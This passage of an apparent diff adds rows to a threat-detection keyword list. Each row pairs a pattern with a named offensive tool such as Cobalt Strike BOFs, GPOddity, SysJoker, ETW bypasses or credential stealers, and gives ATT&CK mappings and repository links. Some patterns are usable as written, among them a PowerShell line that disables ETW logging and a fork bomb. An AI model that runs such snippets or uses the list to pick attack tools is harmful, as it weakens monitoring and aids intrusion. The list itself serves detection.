+"*/zerologon.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*/zerologon.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/zerologon.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/zhzyker/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/zhzyker/CVE-2020-5902/","1","0","N/A","N/A","1","13","8","2020-07-08T04:10:12Z","2020-07-08T04:02:07Z" 
+"*/zsh_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/zwjjustdoit/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0002 - TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/zwjjustdoit/cve-2022-23131","1","1","N/A","N/A","1","0","3","2022-02-21T04:55:57Z","2022-02-21T02:42:23Z" +"*:(){:I: &I*","greyware_tool_keyword","linux","fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation","T1499","TA0040","N/A","N/A","Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*:\ProgramData\RecoverySystem\recoveryWindows.zip*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*:\ProgramData\SystemData\igfxCUIService.exe*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - 
TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*:\ProgramData\SystemData\tempo1.txt*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*:\ProgramData\SystemData\tempo2.txt*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*:\Users\Public\Music\*.dll*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*:'123pentest'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
+"*:8999/Payloads/*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*:9090*/api/v1.0/relays*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*?convert_ccache_to_kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*?convert_kirbi_to_ccache*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*?PSAmsi*PSReflect.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*?sample_sliver.json*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*[!] Failed to enumerate Credman:*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*[!] Dumping the ntds can crash the DC on Windows Server 2019. 
Use the option*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[#] Ready For ETW Patch.*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*[*] Downloading the legitimate GPO from SYSVOL*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[*] Injecting malicious scheduled task into downloaded GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[*] Smuggling in HTML*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*[*] Smuggling in SVG*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*[*] Updating downloaded GPO version number to ensure automatic GPO application*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[-] failed to spawn shell: %s*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*[-] kernel not vulnerable*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*[-] Seems like we 
killed auditd. Ooopsie :D*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*[+] Adding your DLL to the LSA Security Packages registry key*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Attack aborted. Exiting*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*[+] Attempting to call the target EXE from the mock directory*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] auditd patched successfully*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*[+] Back to C&C Console*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*[+] Bof replay:*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*[+] Creating mock directories*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Deobfuscated dump saved in file decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*[+] Enumerating driver services...*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] ETW Patched, No Logs No Crime !*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*[+] Generated XOR key: *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] Generating base64 encoded PowerShell 
script*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*[+] Keylogger started*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*[+] Keylogger stopped*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*[+] keystrokes dump from agent*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*[+] Opened Process Token Sucessufully!*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*[+] Registry key set. 
DLL will be loaded on reboot*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Safety checks passed. Implanting your DLL*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Save encrypted shellcode to *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] SeImpersonatePrivilege enabled*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*[+] Stole token from*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*[+] Successfully downloaded legitimate GPO from SYSVOL to *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] Successfully injected malicious scheduled task*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] Successfully spoofed GPC gPCFileSysPath attribute*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] The encrypted payload with *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] Your payload must be executed now !*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*[i] AAD Join:*enumerate*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*[i] Credman:*Credential Blob Decrypted*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*[i] Hooked Ntdll Base Address : *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*[i] Unhooked Ntdll Base Address: *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" 
+"*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*","offensive_tool_keyword","powershell","impair the defenses of the targeted system by disabling ETW logging for PowerShell. This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected","T1562","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*['spawnto']*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*[x] Cannot load NTDLL.DLL*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z"
+"*[X] Your harvest exploded:*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z"
+"*\ rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"*\*.O365.GroupMembership_AdminGroups.txt*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z"
